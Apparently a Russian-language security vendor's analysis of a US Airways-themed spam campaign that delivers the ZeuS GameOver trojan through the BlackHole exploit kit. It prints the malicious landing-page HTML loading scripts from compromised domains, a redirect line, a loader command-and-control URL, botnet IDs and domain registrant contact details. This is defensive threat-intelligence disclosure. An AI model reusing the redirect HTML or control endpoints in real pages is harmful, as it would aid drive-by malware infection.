ZeuS-подарок для пассажиров US Airways

Спам

20-го марта мы зафиксировали спам-рассылку, нацеленную на пассажиров авиакомпании US Airways. В течение практически всей прошлой недели многочисленным пользователям якобы от компании US Airways рассылалось письмо следующего содержания:

В письме-подделке описывается процесс регистрации полета и приводится код подтверждения для онлайн-бронирования.

По замыслу злоумышленников, если такое письмо получит пассажир, который собирается лететь указанным в письме рейсом, то он, скорее всего, пройдет по ссылке «Online reservation details» («Детали онлайн-бронирования»).

Ссылки в рассылаемых письмах отличались — например, мы видели ссылки на следующие домены: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com. Пройдя по ссылке, в результате серии редиректов пользователь попадал на страницу с эксплойт-паком BlackHole.

Эксплойт-пак BlackHole: редиректы и заражение

Используется типичная для BlackHole схема заражения.
Сначала по ссылке в письме пользователь попадает на страничку с html-кодом следующей структуры:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>

В результате с разных доменов в браузер пользователя загружаются скрипты, которые по сути являются редиректами — в них содержится команда вида "document.location='http://indigocellular.com/<removed>'". Эта команда направляет пользователя на страничку, код которой содержит обфусцированный javascript.

Результатом работы javascript является вставка в код страницы ссылки на объект с эксплойтом. Мы обнаружили 3 вида таких объектов: jar-файл, swf-файл и документ pdf. Каждый из этих объектов эксплуатирует уязвимость в соответствующем приложение – Java, Flash Player или Adobe Reader, — чтобы запустить на атакуемой машине вредоносный код. Если пользователь использует уязвимую версию хотя бы одного из таких приложений, атака проходит успешно, и на компьютер пользователя загружается и запускается вредоносный исполняемый файл.

Вредоносные jar, swf и pdf документы грузятся с разных доменов — в частности, indigocellular.com, browncellular.com, bronzecellular.com (информация по этим доменам) — под именами Qai.jar, field.swf, dea86.pdf, 11591.pdf.

Эти файлы с эксплойтами ЛК детектирует как:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

В результате использования уязвимостей с тех же доменов, на которых размещены эксплойты, загружается исполняемый файл. Он может грузиться под разными именами (about.exe, contacts.exe и др.) и по сути является загрузчиком. Загрузчик при запуске связывается с командным центром по URL “176.28.18.135/pony/gate.php”, загружает и запускает на компьютере пользователя другую вредоносную программу — ZeuS/ZBot, точнее, модификацию одной из веток разработки этого троянца, известную под названием GameOver.

ZeuS грузится со взломанных сайтов, в их числе:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Полиморфизм

На всех этапах этой атаки все объекты — домены, ссылки на javascript, файлы с эксплойтами, загрузчик и ZeuS — довольно быстро заменялись новыми. Домены «жили» примерно 12 часов, самплы ZeuS менялись чаще.

За те небольшие промежутки времени, в которые велось наблюдение, мне удалось зафиксировать 6 модификаций загрузчика и 3 модификации ZeuS.

Напомню, что одной модификации соответствуют все версии вредоносной программы, которые детектируются с одним и тем же вердиктом, то есть число задетектированных программ, как правило, превышает число вердиктов.

Вердикты загрузчика:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Общее число программ, задетектированных этими вердиктами: 250.

Вердикты ZeuS:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Общее число самплов, задетектированных этими вердиктами: 127.

Как уже было сказано выше – это только те вердикты, за которыми мне удалось уследить. За все время спам-кампании новых модификаций появилось, конечно же, больше.

Идентификаторы ботнетов

У ZeuS менялась не только обертка (пакер, антиэмуляция), пересобирался и сам зловред. В нем менялись идентификатор ботнета и некоторые «вшитые» IP-адреса компьютеров, с которыми ZeuS пытается установить связь при заражении. Причем, скорее всего, идентификатор ботнета и IP-адреса менялись при каждой второй перепаковке.

Проанализировав 48 версий различных модификаций ZeuS, которые злоумышленники использовали в этой атаке, я выявил 19 уникальных идентификаторов ботнетов:

chinz22	chinz24	blk25	mmz22	mmz24	mmz25
molotz25	NR22	NR23	NR24	NR25	ppcz22
ppcz23	ppcz24	rnato25	rubz22	rubz23	rubz24
zuu

В отличие от традиционного ZeuS, в котором, как правило, содержится один адрес для получения файла конфигурации, в каждом сампле GameOver «зашито» 20 IP-адресов с портами. Заразив компьютер, GameOver пытается установить соединение по этим адресам, чтобы сообщить о себе, получить информацию, например, веб-инжекты, отослать перехваченные у пользователя данные.

Из 960 IP-адресов, полученных в результате анализа 48 самплов, уникальных оказалось 157:

+Развернуть список ip-адресов

География атаки

Могу предположить, что на прошлой неделе для распространения ZeuS использовалось не только спам-письмо со ссылкой на подтверждение онлайн-бронирования полетов в компании US Airways. Злоумышленникам не откажешь в оригинальности — хотя они уже не раз прибегали к теме, связанной с авиаперелетами, но такой спам замечен впервые. Если получатель письма входит в целевую аудиторию, то с большой вероятностью нажмет на вредоносную ссылку. Однако большинство пользователей, получивших такое письмо, никуда не собирались лететь, так что среагировали на него немногие.

Очевидно, рассылались и другие спамовые письма со ссылками, которые вели на те же сайты, те же эксплойты и на те же вредоносные программы, о которых рассказано выше. Я посмотрел, в каких странах на прошлой неделе на компьютерах наших пользователей чаще всего блокировались угрозы, так или иначе связанные с этой атакой. Ниже приведено распределение детектов эксплойтов, загрузчиков и модификаций ZeuS, использованных злоумышленниками, по странам:

Россия	32.8%
США	10.3%
Италия	9.2%
Германия	8.6%
Индия	6.9%
Франция	3.8%
Украина	3.6%
Польша	3.2%
Бразилия	3.1%
Малайзия	3%
Испания	2.9%
Китай	2.7%

P.S. Информация о некоторых вредоносных доменах, замеченных в описанной спам-кампании
(регистрационные данные неоднократно использовались для регистрации других доменов, участвующих в распространении вредоносного ПО через спам):

indigocellular.com	209.59.218.102
Зарегистрирован на:	Nicholas Guzzardi, clarelam@primasia.com
	5536 Gold Rush Dr.NW
	87120 Albuquerque
	United States
	Tel: +1.5053505497
browncellular.com	174.140.168.207
Зарегистрирован на:	Renee Fabian, clarelam@primasia.com
	2840 Center Port Circle
	Pompano Beach, FL 33064
	US
bronzecellular.com	96.9.151.220
Зарегистрирован на:	Renee Fabian, clarelam@primasia.com
	2840 Center Port Circle
	Pompano Beach, FL 33064
	US

UPDATE: Добавлена выборка md5 файлов.

+Развернуть список md5